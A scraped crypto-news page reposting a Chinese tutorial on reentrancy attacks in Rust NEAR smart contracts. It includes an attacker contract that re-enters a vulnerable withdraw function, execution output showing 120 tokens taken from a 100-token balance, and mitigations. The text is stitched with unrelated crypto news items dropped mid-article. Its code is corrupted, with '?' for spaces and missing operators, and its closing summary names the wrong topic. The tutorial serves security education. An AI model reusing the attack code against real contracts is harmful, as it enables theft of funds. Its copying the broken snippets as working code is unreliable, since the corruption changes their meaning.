区块见闻 区块见闻
Ctrl+D收藏区块见闻
首页 > 中币下载 > 正文

ACK:Rust智能合约养成日记(5)_Tusk Token

作者:

时间:

相关文章:

Rust智能合约养成日记合约状态数据定义与方法实现

Rust智能合约养成日记编写Rust智能合约单元测试

Rust智能合约养成日记Rust智能合约部署,函数调用及Explorer的使用

Rust智能合约养成日记Rust智能合约整数溢出

这一期中我们将向大家展示Rust合约中重入攻击,并提供给开发者相应的建议。本文中的相关代码,已上传至BlockSec的Github上,读者可以自行下载:https://github.com/blocksecteam/near_demo

我们用现实生活中的简单例子来理解重入攻击:即假设某用户在银行中存有100元现金,当用户想要从银行中取钱时,他将首先告诉柜员-A:“我想要取60元”。柜员-A此时将查询用户的余额为100元,由于该余额大于用户想要取出的数额,所以柜员-A首先将60元现金交给了该位用户。但是当柜员-A还没有来得及将用户的余额更新为40元的时,用户跑去隔壁告诉另一位柜员-B:“我想要取60元”,并隐瞒了刚才已经向柜员-A取钱的事实。由于用户的余额还没有被柜员-A更新,柜员-B检查用户的余额仍旧为100元,因此柜员-B将毫不犹豫地继续将60元交给用户。最终用户实际已经获得了120元现金,大于之前存在银行中的100元现金。

为什么会发生这样的事情呢?究其原因还是因为柜员-A没有事先将用户的60元从该用户的账户中扣除。若柜员-A能事先扣除金额。用户再询问柜员-B取钱时,柜员-B就会发现用户的余额已更新,无法取出比余额(40元)更多的现金了。

以上述“从银行取钱”这一典型过程为例,映射到具体的智能合约世界中来,实际上跨合约调用行为的发生和真正更新本地所维护的合约数据之间也同样地存在一定的时间间隔。而该时间间隔的存在以及这两个步骤之前不恰当的顺序关系,将给攻击者实施重入攻击创造有利条件。

下文第2小节将首先介绍相关的背景知识,第3小节将在NEARLocalNet中演示说明一个具体的重入攻击例子,以体现代码重入对于部署在NEAR链上的智能合约的危害性。本文最后将具体介绍针对重入攻击的防护技术,帮助大家更好的编写Rust智能合约。

交易所,充值(deposite)或者提现(withdraw)一定数额的Token时,用户便可以调用相应的合约接口完成具体的操作。

Web3游戏STELLA FANTASY完成600万美元融资,KRUST UNIVERSE参投:9月13日消息,据外媒报道,RING GAMES旗下Web3游戏STELLA FANTASY宣布完成600万美元融资,韩国互联网巨头Kakao旗下公链KLAYTN主网开发商兼KLAYTN生态系统孵化器KRUST UNIVERSE参投。RINGGAMES首席执行官JoohoYUN透露,在KRUSTUNIVERSE支持下,预计能在年内为全球游戏玩家推出一款真正的P2E游戏,此外STELLA FANTASY第一次NFT预售将于9月14日开启。(雅虎财经)[2022/9/13 13:25:16]

DEX项目合约在执行所对应的接口函数时,将调用Token合约中的ft_transfer/ft_transfer_call函数,实现正式的转账操作。这两个函数的区别如下:

当调用Token合约中的ft_transfer函数时,转账的接收者(receiver_id)为EOA账户。

当调用Token合约中的ft_transfer_call函数时,转账的接收者(receiver_id)为合约账户。

而对于ft_transfer_call而言,该方法内部除了首先会扣除该笔交易发起者(sender_id)的转账数额,并增加受转账用户(receiver_id)的余额,此外还额外增加了对receiver_id合约中ft_on_transfer(收币函数)的跨合约调用。这里可以简单理解为,此时Token合约将提醒receiver_id合约,有用户存入了指定数额的Token。receiver_id合约将在ft_on_transfer函数中自行维护内部账户的余额管理。

合约A:Attacker合约;

攻击者将利用该合约实施后续的攻击交易。

合约B:Victim合约。

为一个DEX合约。初始化的时候,Attacker账户拥有余额100,DEX的其他用户拥有余额100。即此时DEX合约总共持有了200个Token。

##pub?struct?VictimContract?{??attacker_balance:?u128,??other_balance:?u128,}impl?Default?for?VictimContract?{??fn?default()?->?Self?{????Self?{??????attacker_balance:?100,??????other_balance:100???}?}}合约C:Token合约。

加密托管商Hex Trust获得新加坡资本市场服务许可证:8月31日消息,加密托管商Hex Trust周二宣布已获得新加坡资本市场服务许可证,可提供受该国证券和期货法监管的托管服务。该公司在声明中表示,其销售和业务开发主管CalvinShen将迁往新加坡,领导新分公司的业务扩张。CEO及联合创始人AlessioQuaglini表示:我们将积极拓展新加坡业务,致力于成为金融机构和数字资产持有人的战略伙伴。Hex Trust在亚洲和欧洲拥有百余家机构客户,包括银行、交易所、投资基金和公司。今年3月,该公司完成了600万美元A轮融资,QBNCapital领投。本月早些时候,Hex Trust与菲律宾联合银行建立合作伙伴关系。该公司在香港和新加坡设有办事处,今年拓展到欧洲市场。(彭博社)[2021/8/31 22:48:22]

攻击发生前,因为Attacker账户没有从Victim合约提现,所以余额为0,此时Victim合约(DEX)的余额为100100=200;

##pub?struct?FungibleToken?{??attacker_balance:?u128,??victim_balance:?u128}impl?Default?for?FungibleToken?{??fn?default()?->?Self?{????Self?{??????attacker_balance:?0,??????victim_balance:?200???}?}

下面描述该代码重入攻击的具体流程:

Attacker合约通过malicious_call函数,调用Victim合约中的withdraw函数;

例如此时Attacker给withdraw函数传入amount参数的值为60,希望从合约B中提现60;

impl?MaliciousContract?{??pub?fn?malicious_call(&mut?self,?amount:u128){????ext_victim::withdraw(??????amount.into(),??????&VICTIM,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?????);?}...}

Phala Network 与 TrustBase 达成战略合作:3月24日,Phala Network 宣布与 TrustBase 正式达成战略合作。双方将围绕波卡生态基础设施建设进行深入合作,后期会基于类 PoW 的经济激励模式产生更加多样化的合作方式。Phala 将释放隐私算力为 TrustBase 链上的 DeFi、数据服务等其他应用项目提供支持,共同丰富波卡生态经济模式。[2021/3/24 19:14:32]

在合约B中,withdraw函数开头处的assert!(self.attacker_balance>=amount);`将检查Attacker账户是否有足够的余额,此时余额100>60,将通过断言,执行withdraw中后续的步骤。

impl?VictimContract?{??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}...}?合约B中的withdraw函数接着将调用合约C中的ft_transfer_call函数;

通过上述代码中的ext_ft_token::ft_transfer_call实现跨合约调用。

合约C中的ft_transfer_call函数,将更新attacker账户的余额=060=60,以及Victim合约账户的余额=200-60=140,随后通过ext_fungible_token_receiver::ft_on_transfer调用合约A的ft_on_transfer“收币”函数。

DeFi协议Flamingo暂停Mint Rush:金色财经报道,据官方Medium文章,基于Neo的互操作性全栈DeFi协议Flamingo表示,由于与Neoline钱包相关的技术问题,Flamingo团队决定暂停目前的Mint Rush。已经在北京时间2020年9月25日22:11,区块高度6212123进行了快照。Mint Rush将尽快重新启动,Flamingo团队正在与钱包服务提供商一起制定计划。[2020/9/26]

#impl?FungibleToken?{??pub?fn?ft_transfer_call(&mut?self,amount:?u128)->?PromiseOrValue<U128>{????//相当于internal_ft_transfer????self.attacker_balance?=?amount;????self.victim_balance???-=?amount;????//CallAttacker的收币函数????ext_fungible_token_receiver::ft_on_transfer(??????amount.into(),??????&ATTACKER,??????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?????).into()?}...}由于合约A被Attacker所控制,并且代码存在恶意的行为。所以该“恶意”的ft_on_transfer函数可以再次通过执行ext_victim::withdraw,调用合约B中的withdraw函数,以此达到重入的效果。

#impl?MaliciousContract?{??pub?fn?ft_on_transfer(&mut?self,?amount:?u128){????//恶意合约的收币函数????if?self.reentered?==?false{??????ext_victim::withdraw(????????amount.into(),????????&VICTIM,?????????0,?????????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL???????);???}????self.reentered?=?true;?}...}由于上一次进入withdraw以来,victim合约中的attacker_balance还没有更新,所以还是100,因此此时仍旧可以通过assert!(self.attacker_balance>=amount)的检查。withdraw后续将再次在FT_Token合约中跨合约调用ft_transfer_call函数,更新attacker账户的余额=6060=120,以及Victim合约账户的余额=140-60=80;

动态 | TrustVerse推出防丢失服务“ NOVA”:Trustverse是以区块链技术为基础的资产管理服务和金融解决方案。 TrustVerse已经拥有五项技术专利,并与三星区块链(Samsung Blockchain)、韩国交易所旗下IT战略机构KOSCOM以及微软公司建立合作。作为第一家注册为三星区块链合作伙伴的区块链金融科技公司,TrustVerse最近推出了防丢失服务“ NOVA”,针对用户的私钥恢复和预防丢失服务, Trustverse所有的DApps应用服务都需要使用TRV token进行支付费用,并使用支付的token来维持Trustverse生态系统的发展。[2019/12/10]

ft_transfer_call再次调用回Attacker合约中的ft_on_transfer函数。由于目前设置合约A中ft_on_transfer函数只会重入withdraw函数一次,所以重入行为在本次ft_on_transfer的调用时终止。

此后函数将沿着之前的调用链逐级返回,导致合约B中的withdraw函数中在更新self.attacker_balance的时候,最终使得self.attacker_balance=100-60-60=-20

由于self.attacker_balance是u128,且并没有使用safe_math,因此将导致整数的溢出现象。

最终执行的结果如下:

$node?Triple_Contracts_Reentrancy.js?FinishinitNEARFinishdeploycontractsandcreatetestaccountsVictim::attacker_balance:3.402823669209385e38FT_Token::attacker_balance:120FT_Token::victim_balance:80

即尽管用户Attacker在DEX中锁定的FungibleToken余额仅100,但是最终Attacker实际获得的转账为120,实现了本次代码重入攻击的目的。

4.代码重入防护技术

4.1先更新和与状态,再转账

更改合约B代码withdraw中的执行逻辑为:

#impl?VictimContract?{??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????self.attacker_balance?-=?amount;????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}??#??pub?fn?ft_resolve_transfer(&mut?self,?amount:?u128){????match?env::promise_result(0){??????PromiseResult::NotReady?=>?unreachable!(),??????PromiseResult::Successful(_)?=>?{?????}??????PromiseResult::Failed?=>?{???????//若ext_ft_token::ft_transfer_call跨合约调用转账失败,???????//则回滚之前账户余额状态的更新self.attacker_balance?=?amount;??????}???};?}

此时的执行效果如下:

$node?Triple_Contracts_Reentrancy.js?FinishinitNEARFinishdeploycontractsandcreatetestaccountsReceipt:873C5WqMyaXBFM3dmoR9t1sSo4g5PugUF8ddvmBS6g3X???Failure:Error:{"index":0,"kind":{"ExecutionError":"Smartcontractpanicked:panickedat'assertionfailed:self.attacker_balance>=amount',src/lib.rs:45:9"}}Victim::attacker_balance:40FT_Token::attacker_balance:60FT_Token::victim_balance:140

可见由于此时的Victim合约在withdraw的时候事先更新了用户的余额,在调用外部的FungibleToken实施转账。因此当第二次重入了withdraw的时候,Victim合约中保存的attacker_balance已经更新为40,因此将无法通过assert!(self.attacker_balance>=amount);使得Attcker的调用流程由于触发了AssertionPanic,无法利用代码重入进行套利。

4.2引入互斥锁

该方法类似于当柜员-A还没有来得及将用户的余额更新为40元的时,用户跑去隔壁告诉另一位柜员-B:“我想要取60元”。尽管用户隐瞒了刚才已经向柜员-A取钱的事实。但是柜员-B却能够知道用户已经去过柜员-A那里,并且还没有办结所有的事项,此时柜员-B便可以拒绝用户来取钱。通常情况下可以通过引入一个状态变量,来实现一个互斥锁

4.3设置GasLimit

例如在DEX合约的withdraw方法调用ext_ft_token::ft_transfer_call时,设置一个适当的GasLimit。此GasLimit将不够支持下一次代码再次重入DEX合约的withdraw函数,以此阻断重入攻击的能力。

例如对代码做如下修改,限制withdraw方法调用外部函数时的GasLimit:

??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,?-???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2???????GAS_FOR_SINGLE_CALL?*?3?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}

修改后执行效果如下

$node?Triple_Contracts_Reentrancy.jsFinishinitNEARFinishdeploycontractsandcreatetestaccountsReceipt:5xsywUr4SePqfuotLXMragAC8P6wJuKGBuy5CTJSxRMX???Failure:Error:{"index":0,"kind":{"ExecutionError":"Exceededtheprepaidgas."}}Victim::attacker_balance:40FT_Token::attacker_balance:60FT_Token::victim_balance:140

可见限制跨合约函数调用时的GasLimit也能起到防止重入攻击的效果。

本期总结和预告

这一期我们讲述了rust智能合约中的整数溢出问题,同时给出了建议,在书写代码时尽量先更新状态,再执行转账操作,并且设定合适的gas值,可以有效抵御重入攻击,下一期我们将讲述rust智能合约中的DoS问题,敬请关注。

标签:ACKRANLANCTOKENquack币发行量TRANSPARENTDollarBalance ShareTusk Token

中币下载热门资讯
GAT:關於支持Tezos(XTZ)網絡升級的公告_NFT

親愛的用戶: 幣安將支持Tezos網絡升級,具體安排如下:幣安預計將於東八區時間2022年4月1日07:53暫停XTZ代幣的充值、提現業務,以支持Tezos將於Tezos區塊高度2,244.

FUTURE:中币开放AE充值和提币业务_Turk Shiba

尊敬的中币用户: ????中币现已开放AE的充值和提币业务。注:AE旧充值地址已失效,请之前已经获取过AE充值地址的用户重新获取地址,使用新地址充值.

ASS:Bridge (BRG)_avalanche币的价格

一、项目介绍 BRG是BSC上的公共预言机。“预言机”将数据从外部世界传输到像以太坊这样的区块链。然后,区块链上的智能合约可以使用这些数据来做出决定,例如是否分配资金以及分配给谁.

SDT:參加Biswap (BSW) 必修課,與您分享100,000美元等值獎池_BSWAP币

活動時間:2022年04月01日08:00至2022年04月08日07:59點擊按鈕,立刻參與活動活動一:參加Biswap(BSW)學習,參與瓜分75,000美元等值BSW卡券獎勵活動期間.

GATE:Gate.io 交易&持倉 DOT,XRP槓桿代幣,瓜分價值$8,800豪華獎池活動發獎公告_Gate.io

“Gate.io槓桿代幣嘉年華—交易&持倉DOT,XRP槓桿代幣,瓜分價值$8,800豪華獎池!”活動已圓滿結束,感謝大家的參與!我們已爲每一位獲獎用戶發放獎勵.

STEPN:“STEPN(GMT)紅包雨”、“STEPN(GMT)必修課”、“SHIB限時迎新福利”、“WAVES混合交易競賽”、“Layer 1 Tokens動手指漲知識活動”活動結束公告_STEER价格

親愛的用戶: “STEPN紅包雨”、“STEPN必修課”、“SHIB限時迎新福利”、“WAVES混合交易競賽”活動、“Layer1Tokens動手指漲知識活動”已結束;卡券獎勵已分發完成.